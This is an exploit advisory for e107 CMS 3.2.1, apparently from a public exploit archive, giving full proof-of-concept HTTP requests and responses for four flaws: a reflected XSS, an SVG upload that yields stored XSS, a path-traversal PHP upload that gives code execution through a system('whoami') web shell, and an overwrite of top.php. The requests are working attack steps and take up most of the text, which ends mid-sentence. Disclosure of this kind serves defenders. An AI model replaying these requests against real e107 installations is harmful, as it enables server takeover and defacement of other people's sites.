e107 CMS 3.2.1 Arbitrary File Upload / Cross Site Scripting

`# Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities  
# Date: 30/04/2022  
# Exploit Author: Hubert Wojciechowski  
# Contact Author: [email protected]  
# Vendor Homepage: https://e107.org/  
# Software Link: https://e107.org/download  
# Version: 3.2.1  
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
  
### XSS Reflected - Via adding comment (Authenticated)  
  
# POC  
Request:  
GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40  
  
Response:  
HTTP/1.1 200 OK  
Date: Tue, 14 Dec 2021 08:02:42 GMT  
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11  
X-Powered-By: e107  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
ETag: "71d7966eaa95fd8ac14da8baf3e0785d"  
Content-Length: 25059  
Vary: Accept-Encoding  
X-Frame-Options: SAMEORIGIN  
Connection: close  
Content-Type: text/html; charset=utf-8  
[...]  
<div class='media' >  
<form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1' >  
[...]  
  
User click to comment in news, writes any character in the comment field, and clicks elsewhere outside the comment field  
  
image.png  
  
  
### Upload restriction bypass (Authenticated [Admin]) + Stored Xss.  
  
Account with administrative privileges can bypass upload image restriction (XSS Stored from .svg file)  
image->media manager->upload a file->Image/File URL  
admin can upload SVG from localhost ->http://127.0.0.1:8070/xxe_svg2.svg  
  
# POC  
  
Request:  
POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 90  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img  
Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: iframe  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption=  
  
Response:  
HTTP/1.1 200 OK  
Date: Tue, 14 Dec 2021 02:06:14 GMT  
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11  
X-Powered-By: e107  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
ETag: "06ed5ef56b0f736995112cafd77e9ec0"  
Content-Length: 20878  
Vary: Accept-Encoding  
X-Frame-Options: SAMEORIGIN  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
<!doctype html>  
<html lang="en">  
<head>  
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr  
[...]  
<div class='well clearfix media-carousel-item-container'>  
<a data-toggle='context' data-bs-toggle='context' class='e-media-select ' data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span>  
</a>  
[...]  
  
image.png  
  
  
### Upload restriction bypass (Authenticated [Admin])+RCE  
  
Upload and execute .PHP file  
Attacker must upload file to ../../../ to parent directory, due to fact that somehow application user can only execute PHP code when uploading to parent directory.  
  
image.png  
  
  
Media Manager-> Media Upload/Import -> From a remote location  
  
# POC  
  
Request  
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 109  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import  
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php  
  
Response:  
HTTP/1.1 200 OK  
Date: Tue, 14 Dec 2021 09:02:08 GMT  
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11  
X-Powered-By: e107  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
ETag: "5b9621fc78893e36034b14f841f840f8"  
Content-Length: 26075  
Vary: Accept-Encoding  
X-Frame-Options: SAMEORIGIN  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
<!doctype html>  
<html lang="en">  
<head>  
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr  
[...]  
  
We can see uploaded PHP file on the server side.  
  
image.png  
  
  
cmd.php file source:  
  
<?php  
system('whoami');  
?>  
  
image.png  
  
  
### Upload restriction bypass (Authenticated [Admin])+ Server file override  
  
Attacker can override example top.php file in the main directory of web application.  
Original file top.php in server:  
image.png  
  
  
We can override file via following upload functionality:  
Media Manager-> Media Upload/Import -> From a remote location  
  
# POC  
  
Request:  
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 109  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import  
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php  
  
Response:  
HTTP/1.1 200 OK  
Date: Tue, 14 Dec 2021 09:20:10 GMT  
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11  
X-Powered-By: e107  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
ETag: "5b9621fc78893e36034b14f841f840f8"  
Content-Length: 26075  
Vary: Accept-Encoding  
X-Frame-Options: SAMEORIGIN  
Connection: close  
Content-Type: text/html; charset=utf-8  
[...]  
  
top.php file content was tampered:  
  
`